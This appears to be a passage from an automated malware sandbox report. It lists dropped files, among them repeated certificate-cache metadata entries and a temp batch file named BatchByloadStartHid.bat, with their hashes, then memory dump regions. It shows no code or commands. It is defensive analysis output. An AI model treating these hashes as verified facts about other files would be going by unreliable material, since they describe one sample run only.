dc895851972c2d659b7e92baf290df726f0e85a1

SHA256
bdb7ad1938f08710bc6b70a9c1097e373059636e38f22ece16836da92d5f6d3f

SHA512
fe77c3185366d1b6beff799e3d09ae1f677c909120ea6ea34b47134f6a0e57ba820434469fb89e62def1f9afa7871a5eae71b8cc872dd1e618f6d79acad13c6c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
34f8d20c9aa61ebbe3f1298b4c3e5b2b

SHA1
c9731c4b963b16f8959d63221ff0db7109d22642

SHA256
f080d587f617d0e314959de8a4a31d49eb367f4cda32df8144681b9d2a6d7d2c

SHA512
2ee4798e4ee310502364b8f03a33b1c6651600313d6fe670c5f82b227006a9e3ed8af11351cff301a95f9b7b46f8ec19ffb00cb2a33746ac10d1d19c22030d07

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
006a694e9081f427d4865df92b891ece

SHA1
069071d896e117486fa360b58df6d6f4049bd2e3

SHA256
510a09471b53f85f87016e88aa907c0274c1955c721dd74e0d5f495f6b1881ba

SHA512
1148dd13cfe9729849ff334594401337240cbc2b070a6ff5f62f11731b94f31f4fb6ba9cbec2a436808557d593ffacb7c57b537e3b0c637913c7b7ef9dc2814d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
50c07aa1cba07581cd282bb4de54e8ed

SHA1
18d4b00e49fcd74a487b2e92ce3dff6e0045ed7a

SHA256
3dfb46437f487f16c2350fc4ad5b1356f98577fd71d5ea4866097f10cd17fed3

SHA512
98e8ab27c3360583ed77b6ddbd6be537e06bf6e60ba9e9989f6778301e91c02c9284dbe90262faf41fc539903b82f0978ae117b4a0d3a83d5349968027c3ca77

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3aaea6a0fefa0dd2c3445d7d427d7171

SHA1
7cda3f97f672ec6e67c7d8b0307fe21c7e299d24

SHA256
1d5f7cb493acf9b3263c55f4be317638b7bd4dcd95f3e6c3cf4eed774d9da1e7

SHA512
16e7cf692fba6db02b8691b915e9070670acfa0e7b9baaa372bd54ba583e503a2bac81df704569509b7b33f99aa8b66c5af8c9ce5d3389beab0c78d728edc2ad

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ea782d630f36cf308ca3b2b32aa2b481

SHA1
c841487be8fbaff01e9768a91204138ba106622c

SHA256
79df5e6af0eb22dca6baab33ac4aa8a5d843927a30dba6dc09fc6961ba36b8ee

SHA512
055428d5d770362e50c0c4353567b0a0b853851b09c96601e245f22f58393dbaebe9650dc38a104ca0fda0fdfebe08a38c3a10746573df2ec0216c55b4814f56

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
bc5b12006ddb73970fe9801862826cff

SHA1
7f9642a1b48afd56bd2b02c96b6532d52649f461

SHA256
0be6a2a6241d47527c5f9ee57a403d4d779af73b883943f42d83ecefbc2a0a0e

SHA512
b8f8cd3677887db7b468b89901bf9e10a942c7ab8fb30758faf7fb82d421b0c3aded241edf543ce7bf20b785bad9a7acfd0595d0e83e78e9f034d99b69b9c8a7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
accd814b7a2ebdd8da00b51906ba028a

SHA1
e6544725c11ca19a7b57571b3dd1ac888edbee1d

SHA256
e840f4d6f88c19e79719cbcc3010e6a662bd1d8ddf1bc39666c65b6f206bb67d

SHA512
74b5756bce7fa857bcb772c9c6aee16f7b825fdd68c0565fe57ad41c6639e19f6298b2d4af5698ac2b031a44d8a1cbaf4e504ec2571a850736220224ad0a78fa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
86c204ff927fbc1842ffb0373d655a4e

SHA1
ad7e91d3c46bae5de9967802e889c9d0b3fab17a

SHA256
be7802a38d83fb6dad0d72c8dfb1fc968cc997a7980bee10a28937516387198b

SHA512
91f55f6798a092e1a8e90cda14036287b1da6fc5f1c8f5bf11f7654c2300ca38495458493a1c6ab05b5b8d0e9cdcbf44ad22694934adf0a8392605f86b2041a2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
fc76de31a5e201e092a337a7395f8122

SHA1
5feacc6bf036a12744d925677fa85632de24d66f

SHA256
9eacddbabe451a02e758de959b48f6427d3740ff03a6631978375db6c44d4157

SHA512
d778b142a9960d9d285a53d2c3d18590723a980f71d59ec2ebc0088d459bb20c6e21f825f1bbcea1af36e03732455f449cf8682fe904a1e61b7b5fea071ef3c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
bc0f4c41771ecb3e008472f442b61ff0

SHA1
154ef4503a9bcbf8f5e70fafb455899f1625f544

SHA256
8cee3a6e55095e62aa8d998271482eaaaddaaea7fa1b1d0e4cb6fd2856c5ef73

SHA512
4adc87a54310e86fdcc43f67f83e230951e0616301711ea729274d5136b319b2bcd5dbfb1655b82c57a836089514937cf36267e875aeb279aa610c24a1eb0f8d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b6b876fa1353a098dddbe85d2d4119f2

SHA1
fe9fddab97cd6a6d0bcd2188611ef805023f7f2a

SHA256
8f2aa61316dd47c4ceca77c2d711cd457ead3caf775820dd53172322c45c8a0a

SHA512
095eaf952b46c7d0987b086be7bc8833031bf924afdbd390838e4fe3703cc4b99d8cde7f52f7689a3614a8da1b8d431ce82dd3b60cc649c405ba713fd719d086

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
39f49d4ed91456878a28cf478b95449e

SHA1
43b68772763650d50e42683d45fe54e508abbd39

SHA256
25c3af2ea40cf05660d32f48d0e9e527fa4201496ab42635393c42663dddf07f

SHA512
ec91136ba8522610e61c70830a26fdf6244d8b573ef66ba18359e7692d38c9ae4049f32f4d46de463c4409e0df9e385b65b7752c35fe2cbe9a96c2ea7e1422a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\BatchByloadStartHid.bat

Filesize
1KB

MD5
45a66afa3b07b3143f0d0c3515898bae

SHA1
cc5baf0c4d2fc0b034974786f20087e058915693

SHA256
8a8c558b5cb169e5d2967dc3e69cb26174bdd8d457903f074477ef1c555b4fb6

SHA512
04aee35c068225ec8982fc273fd4e4e172cf336b26561d5b8c7ccf3fe972c485b962d01bdcfab2a27fe456364114417dc3c44852d8431def9a04812e8008106f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabBF4B.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarBF6E.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c430f6c5215cbe5e659e513bf1d01eb3

SHA1
d41910a415d73344885af6ece20eb36425c9ebef

SHA256
543876c4b079ce81d3ce223711c9f733f45982a5bb80e244fdbd8a6f9f30bbcc

SHA512
d69afe83a55e2455cda85929405eeb9ea42f3ff4833fdfd78e2634676f6d36333eaa0cb43b2d2dac32dfa155f647c1123d9417471696d0a4a77f227b1d737f7d

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1200-93-0x0000000002070000-0x0000000002078000-memory.dmp

Filesize
32KB

Download
memory/1200-92-0x000000001B520000-0x000000001B802000-memory.dmp

Filesize
2.9MB

Download
memory/1248-85-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

Filesize
2.9MB

Download
memory/1248-86-0x0000000001D80000-0x0000000001D88000-memory.dmp

Filesize
32KB

Download
memory/2776-54-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2776-53-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/2980-47-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2980-4-0x000007FEF5CFE000-0x000007FEF5CFF000-memory.dmp

Filesize
4KB

Download
memory/2980-11-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2980-5-0x000000001B4D0000-0x000000001B7B2000-memory.dmp

Filesize
2.9MB

Download
memory/2980-9-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2980-10-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2980-6-0x00000000028F0000-0x00000000028F8000-memory.dmp

Filesize
32KB

Download
memory/2980-8-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2980-7-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download